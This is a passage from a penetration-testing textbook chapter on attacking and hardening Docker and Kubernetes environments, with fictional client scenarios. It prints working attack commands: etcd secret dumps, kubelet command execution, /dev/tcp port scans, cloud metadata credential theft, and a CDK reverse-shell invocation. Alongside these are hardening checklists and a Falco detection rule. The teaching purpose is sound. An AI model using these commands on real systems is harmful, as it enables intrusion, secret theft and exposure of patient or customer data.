⚠️ Critical Finding Pattern: In MedSecure's assessment, the default service account in the production namespace had permissions to read all secrets. Since every pod uses the default service account unless otherwise specified, any compromised pod could read database credentials, API keys, and TLS certificates.
Accessing etcd Directly:
If you can reach etcd (default port 2379), you can bypass all RBAC and read every secret:
# Check if etcd is accessible
curl -s https://ETCD_IP:2379/version --cacert ca.crt --cert client.crt --key client.key
# Read all secrets from etcd
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
--cacert=ca.crt --cert=client.crt --key=client.key \
get /registry/secrets --prefix --keys-only
# Read a specific secret
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
--cacert=ca.crt --cert=client.crt --key=client.key \
get /registry/secrets/medsecure-production/database-credentials
32.5.4 API Server Exploitation
The Kubernetes API server is the crown jewel. Misconfigurations can expose it to unauthenticated access:
# Check for unauthenticated access
curl -sk https://K8S_API:6443/api/v1/namespaces
# Check for anonymous authentication
curl -sk https://K8S_API:6443/api/v1/pods
# Check common insecure API server flags:
# --anonymous-auth=true (default, often combined with permissive RBAC)
# --insecure-port=8080 (deprecated but sometimes still used)
# --authorization-mode=AlwaysAllow (devastating if present)
# Token brute-force is not practical, but token leakage is common
# Check CI/CD logs, environment variables, and config maps for tokens
Kubernetes Dashboard Exploitation:
The Kubernetes Dashboard, when exposed without authentication, provides a web UI for full cluster management:
# Common dashboard URLs
# https://K8S_IP:30000
# https://K8S_IP/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
# Check if dashboard is exposed
nmap -sS -p 30000,8443,443 K8S_IP
# If accessible, the dashboard may allow:
# - Viewing all resources across namespaces
# - Creating new deployments
# - Executing commands in pods
# - Reading secrets
🔴 Real-World Attack: The Tesla Kubernetes incident (detailed in Case Study 1) began with an exposed, unauthenticated Kubernetes dashboard. Attackers used it to deploy cryptocurrency miners and discovered AWS credentials in the environment, demonstrating the cascading impact of a single misconfiguration.
32.5.5 Lateral Movement in Kubernetes
Once inside a Kubernetes cluster, lateral movement follows several patterns:
# Service discovery via DNS
nslookup kubernetes.default.svc.cluster.local
nslookup *.medsecure-production.svc.cluster.local
# Scan internal service network
# Kubernetes services typically use 10.96.0.0/12
# Pods typically use 10.244.0.0/16 (depends on CNI)
for ip in $(seq 1 254); do
timeout 1 bash -c "echo >/dev/tcp/10.96.0.$ip/80" 2>/dev/null && \
echo "10.96.0.$ip:80 open"
done
# Access other services via Kubernetes DNS
curl http://patient-database.medsecure-production.svc.cluster.local:3306
curl http://redis-cache.medsecure-production.svc.cluster.local:6379
# Check for network policies (if kubectl available)
kubectl get networkpolicies -A
# Empty output = no network segmentation between pods
💡 Penetration Testing Technique: In environments without network policies (the majority of Kubernetes clusters), any pod can communicate with any other pod. After compromising a low-value frontend pod, scan the internal network to discover databases, caches, and internal APIs that are not exposed externally.
MedSecure Lateral Movement Example:
During MedSecure's assessment, the team compromised a patient-facing appointment scheduling pod. From this pod, they discovered:
- No network policies existed in any namespace
- The pod could reach the patient-records service on port 5432 (PostgreSQL)
- The database credentials were stored as Kubernetes Secrets that the pod's service account could read
- Using the credentials, the team connected to the database and demonstrated read access to 50,000 patient records
The attack chain—web application exploit to pod shell to service account token to secret extraction to database access—never required a container escape. The lack of network policies and overpermissioned RBAC were sufficient for a complete compromise of patient data. This finding resulted in HIPAA notification requirements and a comprehensive remediation program.
Kubernetes DNS for Service Discovery:
Kubernetes provides built-in DNS that resolves service names to cluster IPs. This is extremely useful for lateral movement:
# Standard Kubernetes DNS format
# <service>.<namespace>.svc.cluster.local
# Discover services by querying DNS
nslookup -type=srv _http._tcp.medsecure-production.svc.cluster.local
# Or use dig for more detailed information
dig +short SRV _http._tcp.medsecure-production.svc.cluster.local
# Enumerate all services in a namespace by trying common names
for svc in api database redis postgres mysql mongodb elasticsearch \
rabbitmq kafka prometheus grafana jenkins; do
nslookup $svc.medsecure-production.svc.cluster.local 2>/dev/null | \
grep -q "Address" && echo "Found: $svc"
done
32.5.6 Kubelet API Exploitation
The kubelet runs on every node and exposes an API on port 10250 (authenticated) and optionally 10255 (read-only, deprecated):
# Check for unauthenticated kubelet access
curl -sk https://NODE_IP:10250/pods
# If accessible, list running pods
curl -sk https://NODE_IP:10250/pods | jq '.items[].metadata.name'
# Execute commands in any pod on this node
curl -sk https://NODE_IP:10250/run/<namespace>/<pod>/<container> \
-d "cmd=id"
# This bypasses all Kubernetes RBAC — the kubelet doesn't enforce it
32.6 Supply Chain Attacks on Container Infrastructure
Supply chain attacks on container infrastructure have emerged as one of the most devastating attack vectors in modern cybersecurity. Unlike traditional attacks that target a single organization, supply chain attacks compromise a shared component—a base image, a CI/CD tool, a package dependency—and impact every organization that uses it. The container ecosystem is particularly vulnerable because containerized applications depend on layers of external components: base operating system images, language runtime images, package manager dependencies, and CI/CD tooling. Each dependency is a potential supply chain attack vector.
The scale of the risk is staggering. A single popular Docker Hub image may be pulled millions of times per month. If that image is compromised—even briefly—the blast radius encompasses every system that pulls and deploys it during the compromise window.
32.6.1 The Container Supply Chain
The container supply chain spans from source code to running production workloads:
Source Code → Build System → Base Images → Dependencies →
Container Registry → Deployment Pipeline → Running Containers
Each link in this chain is a potential attack vector. Supply chain attacks are particularly devastating because they compromise the trusted deployment process itself.
32.6.2 Image Supply Chain Attacks
Typosquatting:
Attackers publish malicious images with names similar to popular legitimate images:
- nginx vs nginnx
- python vs pythonn
- node vs n0de
Base Image Poisoning: If an attacker compromises an upstream base image (e.g., an official language runtime image), every image built on top of it inherits the compromise.
Tag Mutability:
Docker tags are mutable—the latest tag or even specific version tags can be overwritten:
# An attacker with registry write access could:
docker pull medsecure/patient-api:v2.1 # Legitimate image
docker tag malicious-image:latest medsecure/patient-api:v2.1
docker push medsecure/patient-api:v2.1 # Overwrites legitimate image
# Defense: Use image digests instead of tags
# medsecure/patient-api@sha256:abc123... (immutable reference)
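The tag-versus-digest distinction can be illustrated without a registry: a content digest changes whenever the bytes change, so a digest-pinned reference cannot silently follow a swapped artifact the way a mutable tag can. A local sketch with a stand-in file (filenames are hypothetical):

```shell
# Work in a throwaway directory
dir=$(mktemp -d)

# Stand-in for an image artifact referenced by a mutable "tag" (its filename)
printf 'legitimate image contents\n' > "$dir/patient-api-v2.1"
pinned=$(sha256sum "$dir/patient-api-v2.1" | awk '{print $1}')

# Attacker overwrites the artifact behind the same name (tag mutability)
printf 'malicious image contents\n' > "$dir/patient-api-v2.1"
current=$(sha256sum "$dir/patient-api-v2.1" | awk '{print $1}')

# A digest-pinned consumer detects the swap; a tag-based one would not
if [ "$pinned" != "$current" ]; then
  echo "digest mismatch: pull by digest would fail, pull by tag would succeed"
fi
rm -rf "$dir"
```

Registries behave analogously: `docker pull image@sha256:...` verifies the manifest digest before use, while `docker pull image:tag` trusts whatever the tag currently points at.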
32.6.3 Build Pipeline Attacks
CI/CD pipelines that build and deploy containers are high-value targets:
# Example: Compromised GitHub Actions workflow
name: Build and Deploy
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      # Attacker compromises a third-party action
      - uses: compromised-org/build-helper@v1
      # This action exfiltrates secrets and injects malicious code
      - run: docker build -t myapp:${{ github.sha }} .
      - run: docker push registry.example.com/myapp:${{ github.sha }}
Codecov Supply Chain Attack (2021): Attackers modified the Codecov Bash Uploader script—a tool used in CI/CD pipelines—to exfiltrate environment variables, including credentials and tokens. Because this script ran inside Docker containers in CI pipelines, it had access to registry credentials, cloud provider tokens, and signing keys. This attack is explored in detail in Case Study 2.
32.6.4 Runtime Supply Chain Risks
Even after deployment, supply chain risks persist:
- Image pull policies: imagePullPolicy: Always means a re-tagged image in the registry could replace a running workload
- Init containers: Often overlooked in security reviews, init containers run before the main application and may have elevated privileges
- Sidecar injection: Service meshes and monitoring tools inject sidecar containers automatically; compromising the injection mechanism affects all pods
32.6.5 Defending the Container Supply Chain
🔵 Blue Team Perspective: A comprehensive container supply chain defense includes:
- Image Signing and Verification — Use cosign or Notary to sign images and enforce signature verification at deployment time via admission controllers
- Immutable Tags / Digest Pinning — Reference images by SHA256 digest, not mutable tags
- Private Base Images — Maintain curated, scanned base images rather than pulling directly from Docker Hub
- SBOM Generation — Create Software Bills of Materials for every image to track dependencies
- Admission Controllers — Use OPA Gatekeeper or Kyverno to enforce security policies at deployment time
- Pipeline Hardening — Isolate CI/CD environments, rotate credentials, minimize secret exposure
- Continuous Scanning — Scan images not just at build time but continuously for newly discovered CVEs
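The image-signing and admission-controller items above meet in practice: a policy engine can refuse to admit pods whose images lack a valid signature. As one illustration, a sketch of a Kyverno ClusterPolicy (the registry pattern and key material are placeholders, and the exact schema should be checked against the Kyverno version in use):

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images      # illustrative policy name
spec:
  validationFailureAction: Enforce # block unsigned images, don't just audit
  rules:
    - name: verify-image-signature
      match:
        any:
          - resources:
              kinds: ["Pod"]
      verifyImages:
        - imageReferences: ["registry.example.com/*"]  # placeholder registry
          attestors:
            - entries:
                - keys:
                    publicKeys: |-
                      -----BEGIN PUBLIC KEY-----
                      ...cosign public key here...
                      -----END PUBLIC KEY-----
```

Paired with cosign-signed builds in CI, a policy like this turns image provenance from a convention into an enforced control.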
32.7 Tools and Techniques for Container Security Assessment
32.7.1 Offensive Tools
| Tool | Purpose | Key Usage |
|---|---|---|
| kube-hunter | K8s penetration testing | Discovers and exploits K8s vulnerabilities |
| peirates | K8s exploitation | Automates common K8s attack techniques |
| CDK | Container escape toolkit | Automated escape detection and exploitation |
| deepce | Docker enumeration | Comprehensive Docker security enumeration |
| kubectl-who-can | RBAC analysis | Identifies overprivileged accounts |
| kubeaudit | K8s configuration audit | Checks for security misconfigurations |
| trivy | Vulnerability scanning | Scans images, configs, IaC |
| grype | Vulnerability scanning | SCA for container images |
Using kube-hunter:
# Remote scanning
kube-hunter --remote K8S_API_IP
# Internal scanning (from within the cluster)
kubectl run kube-hunter --image=aquasec/kube-hunter --restart=Never \
-- --pod
# Active exploitation mode (use with caution!)
kube-hunter --remote K8S_API_IP --active
Using CDK (Container Escape Toolkit):
# Run CDK inside a container for automated assessment
./cdk evaluate
# Check for escape vectors
./cdk evaluate --full
# Exploit specific vulnerability
./cdk run shim-pwn <reverse_shell_ip> <port>
32.7.2 Defensive Tools
| Tool | Purpose |
|---|---|
| kube-bench | CIS Kubernetes Benchmark checks |
| Falco | Runtime security monitoring |
| OPA Gatekeeper | Policy enforcement admission controller |
| Kyverno | Kubernetes-native policy management |
| Aqua Security | Full container security platform |
| Sysdig Secure | Runtime container security |
| NeuVector | Container network and runtime security |
Using kube-bench:
# Run kube-bench for CIS Benchmark compliance
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
kubectl logs job/kube-bench
# Check specific sections
kube-bench run --targets master
kube-bench run --targets node
kube-bench run --targets etcd
32.7.3 Security Assessment Methodology
A structured approach to container and Kubernetes penetration testing:
Phase 1: Reconnaissance - Identify container orchestration platform and version - Enumerate exposed ports and services - Discover Kubernetes API server, dashboard, and kubelet endpoints - Map the container registry infrastructure
Phase 2: Image Analysis - Scan all accessible images for CVEs - Inspect image layers for embedded secrets - Review Dockerfiles and build configurations - Assess base image provenance and update frequency
Phase 3: Configuration Audit - Run kube-bench for CIS compliance - Enumerate RBAC policies for overpermissioning - Check network policies for segmentation - Review pod security standards / pod security policies - Assess Secrets management practices
Phase 4: Exploitation - Attempt API server anonymous access - Test kubelet API authentication - Enumerate and abuse service account permissions - Attempt container escapes from compromised pods - Test lateral movement between namespaces
Phase 5: Post-Exploitation - Pivot to cloud provider APIs using pod credentials - Access secrets stores (etcd, external vaults) - Demonstrate data exfiltration paths - Document complete attack chains
Phase 6: Reporting - Map findings to CIS Kubernetes Benchmark controls - Prioritize by exploitability and impact - Provide specific remediation steps - Include architecture-level recommendations
32.8 Hardening Containers and Kubernetes
32.8.1 Docker Hardening Checklist
✅ Docker Hardening Best Practices:
- Run containers as non-root users
- Use read-only root filesystems (--read-only)
- Drop all capabilities and add only what is needed (--cap-drop ALL --cap-add NET_BIND_SERVICE)
- Enable seccomp profiles
- Enable AppArmor or SELinux profiles
- Do not mount the Docker socket into containers
- Use multi-stage builds to minimize image size
- Scan images in CI/CD and block deployment of vulnerable images
- Pin base images to digests, not tags
- Set memory and CPU limits
- Use user namespaces (--userns-remap)
- Enable Docker Content Trust for image signing
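Several checklist items (digest pinning, non-root users, minimal copy surface) live directly in the Dockerfile. A hedged sketch; the digest, user ID, and paths are placeholders:

```dockerfile
# Pin the base image by digest, not by tag (digest below is a placeholder)
FROM alpine@sha256:0000000000000000000000000000000000000000000000000000000000000000

# Create and switch to an unprivileged user
RUN adduser -D -u 10001 appuser
USER appuser

# Copy only the built artifact, owned by the non-root user
COPY --chown=appuser:appuser ./app /usr/local/bin/app
ENTRYPOINT ["/usr/local/bin/app"]
```

Runtime flags such as --read-only and --cap-drop ALL then complement what the image itself already enforces.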
32.8.2 Kubernetes Hardening Checklist
✅ Kubernetes Hardening Best Practices:
- Enable RBAC and follow least privilege
- Do not use the default service account for workloads
- Encrypt Secrets at rest in etcd
- Enable audit logging
- Implement network policies for pod-to-pod segmentation
- Use Pod Security Standards (Restricted profile)
- Disable anonymous authentication on the API server
- Enable TLS everywhere (API server, kubelet, etcd)
- Use admission controllers (OPA Gatekeeper, Kyverno) to enforce policies
- Rotate certificates and tokens regularly
- Keep Kubernetes version up to date
- Restrict access to etcd
- Disable the Kubernetes Dashboard or secure it properly
- Use a service mesh for mTLS between services
- Implement resource quotas and limit ranges
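As a concrete starting point for the network-policy item, a default-deny policy blocks all pod traffic in a namespace until explicit allow rules are added (the namespace name reuses the chapter's running example):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: medsecure-production  # example namespace from this chapter
spec:
  podSelector: {}                  # empty selector = every pod in the namespace
  policyTypes:
    - Ingress
    - Egress
```

With this in place, each legitimate flow (for example, frontend to database) must be granted by its own allow policy, which directly breaks the lateral-movement pattern described in 32.5.5.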
32.8.3 Runtime Security Monitoring
Beyond configuration hardening, continuous runtime monitoring detects active attacks:
# Example Falco rule: Detect container escape attempt
- rule: Container Escape via mount
  desc: Detect attempts to mount host filesystems from within containers
  condition: >
    spawned_process and container and
    proc.name = mount and
    proc.args contains "/dev/sd"
  output: >
    Container escape attempt via mount detected
    (user=%user.name container=%container.name image=%container.image.repository
    command=%proc.cmdline)
  priority: CRITICAL
  tags: [container, escape]
32.9 Cloud-Specific Considerations
32.9.1 Managed Kubernetes Services
The major cloud providers offer managed Kubernetes services that handle control plane management but introduce cloud-specific attack vectors:
AWS EKS (Elastic Kubernetes Service): - IAM roles for service accounts (IRSA) can be misconfigured - EKS worker nodes have IAM instance profiles - The IMDS (Instance Metadata Service) is accessible from pods unless blocked - VPC CNI plugin has specific network security implications
Azure AKS (Azure Kubernetes Service): - Azure Active Directory integration for authentication - Managed identity for pods - Azure Policy integration for compliance - The Azurescape vulnerability (2021), found in the closely related Azure Container Instances service, demonstrated that cross-tenant escape in Azure's container platforms is achievable
Google GKE (Google Kubernetes Engine): - Workload Identity for GCP service account binding - GKE Autopilot enforces hardened security baseline - Metadata server access from pods
Cloud IMDS Exploitation from Pods:
# AWS: Access Instance Metadata Service
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# For IMDSv2 (requires token)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure: Access Instance Metadata Service
curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP: Access Metadata Service
curl -s -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/"
⚠️ Critical Cloud Risk: In ShopStack's AWS EKS environment, the worker node's IAM role had S3 read access for application configuration. By exploiting a web application vulnerability in a pod, we accessed the IMDS, obtained temporary AWS credentials, and used them to read S3 buckets containing customer data—all without escaping the container.
32.9.2 Multi-Tenancy Risks
Shared Kubernetes clusters serving multiple teams or customers present unique risks: - Namespace isolation is not a security boundary without network policies - Shared node resources enable noisy neighbor attacks - Cluster-wide resources (ClusterRoles, PriorityClasses) can be abused - Shared admission controllers and mutating webhooks affect all tenants
Assessment Approach for Multi-Tenant Clusters:
When assessing multi-tenant Kubernetes environments, evaluate each isolation dimension:
- Network Isolation: Are network policies enforced between tenant namespaces? Can pods in tenant A reach services in tenant B?
- RBAC Isolation: Can tenant A's service accounts list resources in tenant B's namespace? Are ClusterRoles properly scoped?
- Resource Isolation: Are ResourceQuotas and LimitRanges enforced? Can one tenant consume all cluster resources?
- Node Isolation: Are dedicated node pools used for different tenants? Are node affinities enforced?
- Storage Isolation: Can tenant A access tenant B's PersistentVolumes? Are storage classes properly segmented?
32.10 Service Mesh Security Considerations
32.10.1 Understanding Service Meshes
Service meshes like Istio, Linkerd, and Consul Connect add a layer of network abstraction to Kubernetes clusters. They provide mutual TLS (mTLS) between services, traffic management, and observability. From a security assessment perspective, service meshes both improve and complicate the security posture.
Security Benefits of Service Meshes: - Automatic mTLS encrypts all inter-service traffic - Fine-grained access policies control which services can communicate - Traffic is observable through the mesh's telemetry - Certificate rotation is automated
Security Risks of Service Meshes: - Increased attack surface through additional control plane components - Misconfigured policies may allow unauthorized access - Sidecar injection mechanisms can be exploited - The mesh's certificate authority is a high-value target - Permissive mode (allowing non-mTLS traffic) undermines the security model
Istio-Specific Assessment Points:
# Check Istio installation
kubectl get pods -n istio-system
# Check if mTLS is enforced
kubectl get peerauthentication -A
# Look for permissive mode (mTLS optional, not enforced)
kubectl get peerauthentication -A -o json | \
jq '.items[] | select(.spec.mtls.mode=="PERMISSIVE") | .metadata.name'
# Check authorization policies
kubectl get authorizationpolicy -A
# An empty output means no authorization policies exist
# (all traffic allowed between services by default)
🔵 Blue Team Perspective: Service meshes provide powerful security capabilities, but they must be configured correctly. Common mistakes include leaving mTLS in permissive mode (which allows plaintext connections), failing to define authorization policies (which allows all service-to-service communication), and not monitoring the mesh control plane for compromise.
32.10.2 Bypassing Service Mesh Security
During penetration tests, you may encounter service meshes that appear to provide strong security. Test these bypass scenarios:
- Direct Pod-to-Pod Communication: If the mesh sidecar can be bypassed, direct pod communication may be possible without mTLS
- Headless Services: Headless services may not have sidecar injection, creating unencrypted communication paths
- Init Container Race Condition: The application container may start before the sidecar is ready, allowing brief unencrypted windows
- Control Plane Compromise: If the Istio control plane (istiod) is compromised, the attacker can modify traffic routing and disable mTLS enforcement
32.11 Reporting Container and Kubernetes Findings
32.11.1 Structuring Your Report
Container and Kubernetes findings should be organized to help the audience understand both the individual vulnerabilities and the systemic risks:
Executive Summary Guidance: - Quantify the findings (e.g., "43% of pods run as root, 0 of 12 namespaces have network policies") - Highlight the most impactful attack chains, not just individual findings - Frame risks in business terms (HIPAA violations, data breach costs, service disruption)
Technical Finding Template:
For each finding, provide:
| Element | Description |
|---|---|
| Title | Clear, specific title (e.g., "Privileged Container in Production Namespace") |
| Severity | CVSS score or qualitative rating with justification |
| Affected Resource | Specific pod, namespace, deployment, or service |
| Description | What was found and why it matters |
| Proof of Concept | Exact commands and outputs demonstrating the issue |
| Impact | What an attacker could achieve through exploitation |
| Remediation | Specific, actionable steps to fix the issue |
| Reference | CIS benchmark control, NIST reference, or vendor documentation |
Common Findings and Suggested Severity Ratings:
| Finding | Suggested CVSS | Rationale |
|---|---|---|
| Privileged container | 9.0+ Critical | Direct path to host compromise |
| Docker socket mounted | 9.0+ Critical | Full daemon control |
| cluster-admin binding to SA | 9.0 Critical | Full cluster access |
| No network policies | 7.5 High | Enables unrestricted lateral movement |
| Secrets not encrypted at rest | 7.0 High | etcd backup exposes all secrets |
| Pods running as root | 6.5 Medium | Increases escape probability |
| No resource limits | 4.0 Medium | DoS potential |
| Image using latest tag | 3.0 Low | Supply chain risk, non-reproducibility |
32.11.2 Mapping to Compliance Frameworks
For regulated environments like MedSecure's healthcare infrastructure:
- HIPAA: Container misconfigurations that expose PHI (patient health information) should be mapped to relevant HIPAA Security Rule requirements
- PCI DSS: ShopStack's payment processing containers must meet PCI DSS requirements for network segmentation, access control, and vulnerability management
- SOC 2: Container security controls map to SOC 2 Trust Service Criteria for security, availability, and confidentiality
- CIS Benchmark: The CIS Kubernetes Benchmark provides the most specific, control-by-control mapping for Kubernetes security findings
32.12 Container Security in CI/CD Pipelines
32.12.1 Assessing the Build Pipeline
Modern container deployments are inseparable from their CI/CD pipelines. A comprehensive container security assessment must evaluate the pipeline that produces, scans, signs, and deploys images.
Pipeline Attack Surface:
Developer Workstation → Source Control (GitHub/GitLab) →
CI System (Jenkins/GitHub Actions/GitLab CI) →
Build Environment (Docker-in-Docker/Kaniko) →
Image Scanning (Trivy/Snyk) →
Container Registry (ECR/GCR/ACR/Harbor) →
Deployment (kubectl/ArgoCD/Flux) →
Runtime Environment (Kubernetes)
Each component in this pipeline represents an attack or assessment target:
Source Control Risks: - Secrets committed to repositories (even in history after removal) - Branch protection bypass allowing malicious Dockerfile modifications - Dependency confusion in package managers referenced by Dockerfiles - Webhook hijacking to trigger unauthorized builds
CI System Risks: - CI runners with excessive permissions (Docker socket access, cloud credentials) - Shared CI runners where jobs from different repositories execute on the same host - Build cache poisoning between pipeline runs - Insecure storage of pipeline secrets
Registry Risks: - Unauthorized push access allowing image replacement - Missing vulnerability scan enforcement (images with critical CVEs deployed) - Tag mutability allowing image substitution after scanning - Registry credentials stored insecurely in pipeline configurations
32.12.2 Pipeline Security Assessment Methodology
When assessing a container CI/CD pipeline, follow this checklist:
📊 Pipeline Security Assessment Checklist: - [ ] Are Dockerfiles linted (hadolint) before build? - [ ] Are base images pinned to digests? - [ ] Are images scanned for vulnerabilities before push? - [ ] Are images signed and signatures verified at deployment? - [ ] Are CI/CD secrets stored securely (not in plaintext)? - [ ] Are CI runners isolated from production networks? - [ ] Are build caches cleared between sensitive builds? - [ ] Are container registries authenticated for both pull and push? - [ ] Do admission controllers enforce image provenance policies? - [ ] Are pipeline logs audited for secret leakage? - [ ] Is there a process for responding to newly discovered CVEs in running images? - [ ] Are SBOMs generated and stored for all production images?
ShopStack Pipeline Assessment Finding:
During ShopStack's assessment, the penetration testing team discovered that their GitHub Actions workflows used a self-hosted runner with Docker socket access and the cluster's kubeconfig file. An attacker who could modify a workflow file (through a compromised developer account or branch protection bypass) could build a malicious container image, push it to ShopStack's private registry using the runner's credentials, and deploy it directly to the production Kubernetes cluster. This finding was rated Critical because it represented a complete compromise path from source control to production. The remediation required isolating the CI runner, implementing branch protection, adding image signing, and deploying an admission controller that rejected unsigned images.
32.13 Practical Lab Exercises
32.13.1 Setting Up Your Lab
For the student home lab, set up a vulnerable Kubernetes environment:
# Install Minikube
curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
sudo install minikube-linux-amd64 /usr/local/bin/minikube
# Start a Minikube cluster
minikube start --driver=docker --kubernetes-version=v1.27.0
# Deploy intentionally vulnerable applications
# Kubernetes Goat - Interactive vulnerability training
kubectl apply -f https://raw.githubusercontent.com/madhuakula/kubernetes-goat/master/guide/docs/scenarios/kubernetes-goat.yaml
# Or use kube-security-lab
git clone https://github.com/raesene/kube_security_lab
cd kube_security_lab && ./setup.sh
32.13.2 Recommended Practice Scenarios
- Docker Escape Lab: Create a privileged container and practice escape techniques
- RBAC Misconfiguration: Set up overpermissioned service accounts and practice escalation
- Secret Discovery: Deploy applications with secrets in environment variables, ConfigMaps, and Kubernetes Secrets; practice finding them
- Network Policy Bypass: Deploy pods across namespaces and test connectivity before and after network policies
- Supply Chain Simulation: Set up a private registry, push a "compromised" image, and trace the attack through deployment
🧪 Lab Safety: All container security exercises should be performed in isolated environments. Never practice container escapes on shared systems, cloud environments with other tenants, or production infrastructure. Minikube and kind provide safe, local environments for learning.
32.14 Summary
Container and Kubernetes security represents one of the fastest-growing areas in penetration testing. The shift from monolithic applications on traditional servers to microservices in containers has fundamentally changed the attack surface, introducing new vulnerability classes while also creating new defensive opportunities.
Key takeaways from this chapter:
- Containers are not VMs — They share the host kernel, and this architectural reality creates escape opportunities that do not exist with hardware virtualization.
- Image security is foundational — Vulnerable base images, embedded secrets, and supply chain compromises start at the build stage and propagate through the entire deployment.
- Kubernetes RBAC is frequently misconfigured — Overpermissioned service accounts, wildcard permissions, and default account usage are among the most common findings in cluster assessments.
- Secrets management requires active design — Kubernetes Secrets are base64-encoded, not encrypted by default. Proper Secrets management requires encryption at rest, external secret stores, and strict RBAC controls.
- Network policies are rarely implemented — The default Kubernetes networking model allows all pod-to-pod communication. Without explicit network policies, lateral movement is trivial.
- Supply chain attacks target the deployment pipeline — Compromising a container image or build process can affect hundreds or thousands of deployments silently.
- Cloud-specific vectors extend the attack surface — Managed Kubernetes services interact with cloud IAM, metadata services, and provider APIs, creating additional exploitation paths.
As you develop your container security testing skills, remember that this field evolves rapidly. New CVEs, escape techniques, and attack patterns emerge regularly. Stay current by following Kubernetes security advisories, container runtime CVEs, and the research community's ongoing work in this space.
🔗 Next Chapter Preview: Chapter 33 explores another cutting-edge domain—AI and Machine Learning Security. As AI systems become increasingly embedded in applications and infrastructure, understanding their unique attack surfaces and vulnerabilities becomes essential for modern penetration testers.
References
- CIS Kubernetes Benchmark v1.8.0, Center for Internet Security, 2024.
- NIST SP 800-190, "Application Container Security Guide," National Institute of Standards and Technology, 2017.
- Kubernetes Security Documentation, https://kubernetes.io/docs/concepts/security/
- Docker Security Best Practices, https://docs.docker.com/develop/security-best-practices/
- "Threat Matrix for Kubernetes," Microsoft, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/
- Madhu Akula, "Kubernetes Goat: Interactive Kubernetes Security Learning," 2023.
- Palo Alto Unit 42, "Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments," 2021.
- Aqua Security, "Container Security Best Practices," 2024.
- OWASP Kubernetes Security Cheat Sheet, https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html
- NSA/CISA, "Kubernetes Hardening Guide," 2022.